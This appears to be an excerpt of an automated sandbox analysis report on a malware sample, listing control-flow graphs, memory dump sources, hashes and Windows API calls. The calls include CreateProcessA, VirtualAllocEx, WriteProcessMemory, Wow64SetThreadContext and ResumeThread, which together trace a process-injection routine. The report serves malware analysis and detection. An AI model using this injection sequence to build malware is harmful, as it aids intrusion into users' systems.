1095->1096 1097 71b5f10 1095->1097 1098 71b5f1e-71b5f22 1096->1098 1099 71b5f2c-71b5f30 1096->1099 1097->1096 1098->1099 1100 71b5f24 1098->1100 1101 71b5f32-71b5f36 1099->1101 1102 71b5f40-71b5f44 1099->1102 1100->1099 1101->1102 1105 71b5f38 1101->1105 1103 71b5f56-71b5f5d 1102->1103 1104 71b5f46-71b5f4c 1102->1104 1106 71b5f5f-71b5f6e 1103->1106 1107 71b5f74 1103->1107 1104->1103 1105->1102 1106->1107 1109 71b5f75 1107->1109 1109->1109
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071B5E66
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 3b43e02b18b579407ada1847a841a9540324a7470c9f935d4d0f2be2eb0be9a2
                                                                        • Instruction ID: 78ba6b1d43ad8a58ac05dca5fc0385237a421ada35fca5e4165c47a3591c253b
                                                                        • Opcode Fuzzy Hash: 3b43e02b18b579407ada1847a841a9540324a7470c9f935d4d0f2be2eb0be9a2
                                                                        • Instruction Fuzzy Hash: BAA15CB1D0031ACFEB25CF68C844BDDBBB2BF48310F14816AE819A7280DB749995CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1110 71b5c30-71b5cc5 1113 71b5cfe-71b5d1e 1110->1113 1114 71b5cc7-71b5cd1 1110->1114 1119 71b5d20-71b5d2a 1113->1119 1120 71b5d57-71b5d86 1113->1120 1114->1113 1115 71b5cd3-71b5cd5 1114->1115 1117 71b5cf8-71b5cfb 1115->1117 1118 71b5cd7-71b5ce1 1115->1118 1117->1113 1121 71b5ce3 1118->1121 1122 71b5ce5-71b5cf4 1118->1122 1119->1120 1123 71b5d2c-71b5d2e 1119->1123 1130 71b5d88-71b5d92 1120->1130 1131 71b5dbf-71b5e79 CreateProcessA 1120->1131 1121->1122 1122->1122 1124 71b5cf6 1122->1124 1125 71b5d51-71b5d54 1123->1125 1126 71b5d30-71b5d3a 1123->1126 1124->1117 1125->1120 1128 71b5d3e-71b5d4d 1126->1128 1129 71b5d3c 1126->1129 1128->1128 1132 71b5d4f 1128->1132 1129->1128 1130->1131 1133 71b5d94-71b5d96 1130->1133 1142 71b5e7b-71b5e81 1131->1142 1143 71b5e82-71b5f08 1131->1143 1132->1125 1135 71b5db9-71b5dbc 1133->1135 1136 71b5d98-71b5da2 1133->1136 1135->1131 1137 71b5da6-71b5db5 1136->1137 1138 71b5da4 1136->1138 1137->1137 1139 71b5db7 1137->1139 1138->1137 1139->1135 1142->1143 1153 71b5f0a-71b5f0e 1143->1153 1154 71b5f18-71b5f1c 1143->1154 1153->1154 1155 71b5f10 1153->1155 1156 71b5f1e-71b5f22 1154->1156 1157 71b5f2c-71b5f30 1154->1157 1155->1154 1156->1157 1158 71b5f24 1156->1158 1159 71b5f32-71b5f36 1157->1159 1160 71b5f40-71b5f44 1157->1160 1158->1157 1159->1160 1163 71b5f38 1159->1163 1161 71b5f56-71b5f5d 1160->1161 1162 71b5f46-71b5f4c 1160->1162 1164 71b5f5f-71b5f6e 1161->1164 1165 71b5f74 1161->1165 1162->1161 1163->1160 1164->1165 1167 71b5f75 1165->1167 1167->1167
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071B5E66
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 81cb416988ed2ad6e30ef266541cd7fcf1ca32681ea0b0dcc08d4932584e4381
                                                                        • Instruction ID: 68de87d2cc773fa2bc1871c178e2e0ec9ec5911f68c46d22295f30715aa543b0
                                                                        • Opcode Fuzzy Hash: 81cb416988ed2ad6e30ef266541cd7fcf1ca32681ea0b0dcc08d4932584e4381
                                                                        • Instruction Fuzzy Hash: 1A914BB1D0031ACFEB25DF68C844BEDBBB2BF48314F148169E859A7280DB749995CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1168 51e18e5-51e1956 1169 51e1958-51e195e 1168->1169 1170 51e1961-51e1968 1168->1170 1169->1170 1171 51e196a-51e1970 1170->1171 1172 51e1973-51e1a12 CreateWindowExW 1170->1172 1171->1172 1174 51e1a1b-51e1a53 1172->1174 1175 51e1a14-51e1a1a 1172->1175 1179 51e1a55-51e1a58 1174->1179 1180 51e1a60 1174->1180 1175->1174 1179->1180 1181 51e1a61 1180->1181 1181->1181
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051E1A02
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1423133394.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_51e0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 3aa4929d3c46042ab6d0ef8cd750f3173f7b43bb44984b18049fbb90526a4f5b
                                                                        • Instruction ID: 4ae91039f630c5dbd58e80aeb9118014747eed8c882085451c4933453384ac9f
                                                                        • Opcode Fuzzy Hash: 3aa4929d3c46042ab6d0ef8cd750f3173f7b43bb44984b18049fbb90526a4f5b
                                                                        • Instruction Fuzzy Hash: 5551C0B1D10349EFDB14CF99C984ADEBBB5FF88310F24822AE819AB210D7759945CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1182 51e18f0-51e1956 1183 51e1958-51e195e 1182->1183 1184 51e1961-51e1968 1182->1184 1183->1184 1185 51e196a-51e1970 1184->1185 1186 51e1973-51e1a12 CreateWindowExW 1184->1186 1185->1186 1188 51e1a1b-51e1a53 1186->1188 1189 51e1a14-51e1a1a 1186->1189 1193 51e1a55-51e1a58 1188->1193 1194 51e1a60 1188->1194 1189->1188 1193->1194 1195 51e1a61 1194->1195 1195->1195
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051E1A02
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1423133394.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_51e0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 2e91dc3e73db45f0f83961e57b625b311cc90eccdae385e1b72ddad2d43ffd20
                                                                        • Instruction ID: b54e8a27d5e6f70a2e3ab462aeffee3cb8cb811b4d45a25a719f22496727a450
                                                                        • Opcode Fuzzy Hash: 2e91dc3e73db45f0f83961e57b625b311cc90eccdae385e1b72ddad2d43ffd20
                                                                        • Instruction Fuzzy Hash: 3F41BEB1D10349EFDB14CF9AC884ADEBBB5FF88350F64812AE819AB210D7759945CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1196 10244b0-10259d9 CreateActCtxA 1199 10259e2-1025a3c 1196->1199 1200 10259db-10259e1 1196->1200 1207 1025a4b-1025a4f 1199->1207 1208 1025a3e-1025a41 1199->1208 1200->1199 1209 1025a60 1207->1209 1210 1025a51-1025a5d 1207->1210 1208->1207 1212 1025a61 1209->1212 1210->1209 1212->1212
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 027cd4a1a82547e3d5df7ccd44f4dd21a9d28396240d10b3160f37c20efeaca2
                                                                        • Instruction ID: c0dab6ab62df193367c13e46702b2bd52e74db855a623f0453a9ae68f4943da6
                                                                        • Opcode Fuzzy Hash: 027cd4a1a82547e3d5df7ccd44f4dd21a9d28396240d10b3160f37c20efeaca2
                                                                        • Instruction Fuzzy Hash: FA41EF71C00729CBEB24CFA9C885BDDBBF5BF49304F20805AD449AB251DBB56945CF94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1213 102590c-10259d9 CreateActCtxA 1215 10259e2-1025a3c 1213->1215 1216 10259db-10259e1 1213->1216 1223 1025a4b-1025a4f 1215->1223 1224 1025a3e-1025a41 1215->1224 1216->1215 1225 1025a60 1223->1225 1226 1025a51-1025a5d 1223->1226 1224->1223 1228 1025a61 1225->1228 1226->1225 1228->1228
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: f7fceb51c0fa340886a7bdce3d0626e94f86f0c790736795dd512c32396d3b4b
                                                                        • Instruction ID: 5279df1d5f29da4222037a94ef418ba5f1bc5e291178ebe21772bbf280241040
                                                                        • Opcode Fuzzy Hash: f7fceb51c0fa340886a7bdce3d0626e94f86f0c790736795dd512c32396d3b4b
                                                                        • Instruction Fuzzy Hash: 4041BEB1C00729CFEB24CFA9C885BDDBBB5BF49304F20805AD449AB251DBB5694ACF54

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1229 51e4040-51e407c 1230 51e412c-51e414c 1229->1230 1231 51e4082-51e4087 1229->1231 1237 51e414f-51e415c 1230->1237 1232 51e40da-51e4112 CallWindowProcW 1231->1232 1233 51e4089-51e40c0 1231->1233 1235 51e411b-51e412a 1232->1235 1236 51e4114-51e411a 1232->1236 1240 51e40c9-51e40d8 1233->1240 1241 51e40c2-51e40c8 1233->1241 1235->1237 1236->1235 1240->1237 1241->1240
                                                                        APIs
                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 051E4101
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1423133394.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_51e0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: e98348cde682f90cae7c05360b2357219d485882531d3669429144b0a705a324
                                                                        • Instruction ID: 847e12b330e94c2f449f53acbdeab176e5840424f5a5f208f60ea568bf0c985c
                                                                        • Opcode Fuzzy Hash: e98348cde682f90cae7c05360b2357219d485882531d3669429144b0a705a324
                                                                        • Instruction Fuzzy Hash: A84108B5900709DFDB14CF99C888AAAFBF5FB88314F24C459E519AB321D775A841CFA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1243 71b59a0-71b59a1 1244 71b59a9-71b59f6 1243->1244 1245 71b59a4-71b59a8 1243->1245 1248 71b59f8-71b5a04 1244->1248 1249 71b5a06-71b5a45 WriteProcessMemory 1244->1249 1245->1244 1248->1249 1251 71b5a4e-71b5a7e 1249->1251 1252 71b5a47-71b5a4d 1249->1252 1252->1251
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071B5A38
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 2bc84ebfab7fce57c7e98391e60bcf065dcbb25adca4498cb623fce61cb77143
                                                                        • Instruction ID: fb77f5816784a9beee0ac0a1191ef511bd55619342af113038ee36281442fe42
                                                                        • Opcode Fuzzy Hash: 2bc84ebfab7fce57c7e98391e60bcf065dcbb25adca4498cb623fce61cb77143
                                                                        • Instruction Fuzzy Hash: 822168B1D003499FDB14CFA9C880BDEBBF5FF48310F10842AE918A7241C7789511CBA4
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071B5A38
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: ffb7c650ea25baa9543d7016b15088c58e750ec66206cd133d4a43224a03410c
                                                                        • Instruction ID: 3a86cda5272e46edd41e24a9ad9b19eb1dbdb28e547e9dd68be4f03e9ced9794
                                                                        • Opcode Fuzzy Hash: ffb7c650ea25baa9543d7016b15088c58e750ec66206cd133d4a43224a03410c
                                                                        • Instruction Fuzzy Hash: 5A2124B1D003599FDB10CFAAC980BEEBBF5FF48310F10842AE919A7240C7789951CBA5
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071B5456
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 3272cfcd3d4df4cd31165bddebb035cd875ebcc071f34e872d87abe21af387c8
                                                                        • Instruction ID: cb9c3261ebcc5eddfa4fb57e6a7dbb862f010e3531884137f87ab07b09bdd977
                                                                        • Opcode Fuzzy Hash: 3272cfcd3d4df4cd31165bddebb035cd875ebcc071f34e872d87abe21af387c8
                                                                        • Instruction Fuzzy Hash: BF2159B1D003099FDB10CFAAC4807EEBBF5EF48210F64842ED959A7241DB789545CBA5
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071B5B18
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: ec01099462d8882a01728ba33c872e4d85d3ac736b6a6f79adcbb94c88d52e08
                                                                        • Instruction ID: 1a1afcba88d51b12b52068377d90c5a290480a9342cc3ca3bb457a440e6de5a4
                                                                        • Opcode Fuzzy Hash: ec01099462d8882a01728ba33c872e4d85d3ac736b6a6f79adcbb94c88d52e08
                                                                        • Instruction Fuzzy Hash: 282139B1C003499FDB14DF9AC940BEEBBF5FF48310F10842AE919A7240C7399500CBA5
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D5F6,?,?,?,?,?), ref: 0102D6B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: dcca5bd4ade89ca4f24403a4f0579e1d26b7cf9c41bc87b3007a928c38d9eeca
                                                                        • Instruction ID: 53c1fee3a029320a582f2d025c03ac01be5ff25210b09e16aef4d1614c1fde2a
                                                                        • Opcode Fuzzy Hash: dcca5bd4ade89ca4f24403a4f0579e1d26b7cf9c41bc87b3007a928c38d9eeca
                                                                        • Instruction Fuzzy Hash: 1A21E3B5D00258EFDB10CF9AD884ADEBBF4EB48310F14841AE958A7350D378A944CFA5
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071B5456
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 8e8bfd59cdb815c09d77d3b251713b08f1b367bc0ad77cefcd81c865249e369a
                                                                        • Instruction ID: 49e03e9f154122a13ea788121272d6ea758f637bf981aa7b7e09714e05bc8673
                                                                        • Opcode Fuzzy Hash: 8e8bfd59cdb815c09d77d3b251713b08f1b367bc0ad77cefcd81c865249e369a
                                                                        • Instruction Fuzzy Hash: 602168B1D003098FDB20CFAAC4807EEBBF4EF48210F64842ED519A7240DB789945CFA4
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071B5B18
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 6dcaf12ba6041be42a8f42b2a326eb0e0032a1b3a73b360598c2b2b80b37c831
                                                                        • Instruction ID: a1bd7c5b1b548747b4232e1cbae1921b9c753b8d74c80cae1c66ee180122d2df
                                                                        • Opcode Fuzzy Hash: 6dcaf12ba6041be42a8f42b2a326eb0e0032a1b3a73b360598c2b2b80b37c831
                                                                        • Instruction Fuzzy Hash: 522116B1C003499FDB14CFAAC940BEEBBF5FF48310F50842AE919A7240C7799501CBA5
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D5F6,?,?,?,?,?), ref: 0102D6B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 12fce50eb386d93b9f1a533c30e869a4327d987461472b8500acaf38f019c290
                                                                        • Instruction ID: 3a43fd4ec2a94d211034ea82049b40c1344e30dcd6aa5432b5f6ac4e557f08fd
                                                                        • Opcode Fuzzy Hash: 12fce50eb386d93b9f1a533c30e869a4327d987461472b8500acaf38f019c290
                                                                        • Instruction Fuzzy Hash: B52112B5D00249DFDB10CFAAD984ADEBBF4EB48310F14841AE958B3310C378AA40CFA0
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071B5956
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: a89c8c37cfdf0d22b83238acaba173547c158902a155e5dd162799d77b5bbee7
                                                                        • Instruction ID: fc0a9f8a7c4e846a4d42b47a084f5236dd16650305d6b8789f356db4daedb6bf
                                                                        • Opcode Fuzzy Hash: a89c8c37cfdf0d22b83238acaba173547c158902a155e5dd162799d77b5bbee7
                                                                        • Instruction Fuzzy Hash: 901167B18003499FDB20CFAAC841BDEBFF5EB48320F24841AE559A7250CB75A514CBA0
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071B5956
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 6a086771e5e902cf6370fa19dd0775a3a0244ff05f50dc89d987da172d52615c
                                                                        • Instruction ID: c0e7103ea3d981582ea6dbac5f1ca1f855cf29e5402555145b431e4eb39658f5
                                                                        • Opcode Fuzzy Hash: 6a086771e5e902cf6370fa19dd0775a3a0244ff05f50dc89d987da172d52615c
                                                                        • Instruction Fuzzy Hash: 91112672C003499FDB24DFAAC844BDEBBF5EB48320F24841AE559A7250CB759550CBA5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 7da79ee982c7096b6292f827a8a3c989909a80a4be83c4ce2b6028d68c1c8270
                                                                        • Instruction ID: 892a6c74af9f57dcedfea70b8f37f951997fec380164b8b0dadb87b93dfff8f9
                                                                        • Opcode Fuzzy Hash: 7da79ee982c7096b6292f827a8a3c989909a80a4be83c4ce2b6028d68c1c8270
                                                                        • Instruction Fuzzy Hash: 1C1146B5D003498FDB24DFAAC4447EEFBF5EB88220F24841AD559A7350CB79A904CBA5
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071B9365
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: b817eb5b9a83984d8c5423db6795b9842a0a8d4698dc9c801f11784364688eef
                                                                        • Instruction ID: c8258e3d396381dc363d8c6fadbc7010785483f202cd2a7b4dc53aef09e10c17
                                                                        • Opcode Fuzzy Hash: b817eb5b9a83984d8c5423db6795b9842a0a8d4698dc9c801f11784364688eef
                                                                        • Instruction Fuzzy Hash: 4A1125BA800349DFDB20CF9AC845BDEFBF8EB48720F10840AE558A7251C375A544CFA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 730a2c1837b8fc886aad0cdac4fd62fd5315c56461969eaeb3362dd7710495e1
                                                                        • Instruction ID: 45d33bf9184ab7e882f1a550fcaf446baf2109affbf399e2d0a906b5bcf9c9f7
                                                                        • Opcode Fuzzy Hash: 730a2c1837b8fc886aad0cdac4fd62fd5315c56461969eaeb3362dd7710495e1
                                                                        • Instruction Fuzzy Hash: E41125B1D003498FDB24DFAAC4447EEFBF5EB88320F24841AD519A7350CB79A944CBA5
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071B9365
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: c1025062b9e88302c55cb6c1e0a2781d85e11fa3670b2a6837664bcd72a0507c
                                                                        • Instruction ID: 00b22d74a763d23d242d66e8e96248334feb063f04aa0e7edcd8aa763c3e18d5
                                                                        • Opcode Fuzzy Hash: c1025062b9e88302c55cb6c1e0a2781d85e11fa3670b2a6837664bcd72a0507c
                                                                        • Instruction Fuzzy Hash: 9011F2B5804349DFDB20CF9AC984BDEFBF8EB48310F10841AE959A7250C379A944CFA1
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0102AF9E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 68e0837aaa0f115dc2a7f68febd49b3bc28d75a6d9ee767ca31101d165eb562a
                                                                        • Instruction ID: 43f629dab24b3f2591d285c74b1c73cfbf0d1249bcb2edfba3b9fe3aa5741fab
                                                                        • Opcode Fuzzy Hash: 68e0837aaa0f115dc2a7f68febd49b3bc28d75a6d9ee767ca31101d165eb562a
                                                                        • Instruction Fuzzy Hash: 651110B6D00249CFDB20CF9AC444BDEFBF4EB88214F10841AD959A7650C379A545CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6136717513a71a05d4c240bfddd893fac0b2c6696fa6efebff0ec8990f49c86a
                                                                        • Instruction ID: 188147b218fa094c4641b9d05447773e729b15e160427c484af7bf67672d9432
                                                                        • Opcode Fuzzy Hash: 6136717513a71a05d4c240bfddd893fac0b2c6696fa6efebff0ec8990f49c86a
                                                                        • Instruction Fuzzy Hash: E1214572548240EFDB15DF14EDC0B26BF61FB88318F30C569EA091F256C376D856CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a29630e117d7d074c0c6374cb75940647169cbccdaaaae5dbbba276bcd9b9e96
                                                                        • Instruction ID: fb43956aefa8753a5515b5a59b72facbd58098d1f701d47078f7da6b8fe5cbd1
                                                                        • Opcode Fuzzy Hash: a29630e117d7d074c0c6374cb75940647169cbccdaaaae5dbbba276bcd9b9e96
                                                                        • Instruction Fuzzy Hash: 19212872508304DFDB14EF14EDC0B16BB65FB94328F20C56DEA0A5F256C336E856CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1418529936.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_e3d000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a92637daf7e5a3b845f48dd3535d93ecb01441a9f4d7b80f5994422382fa03ce
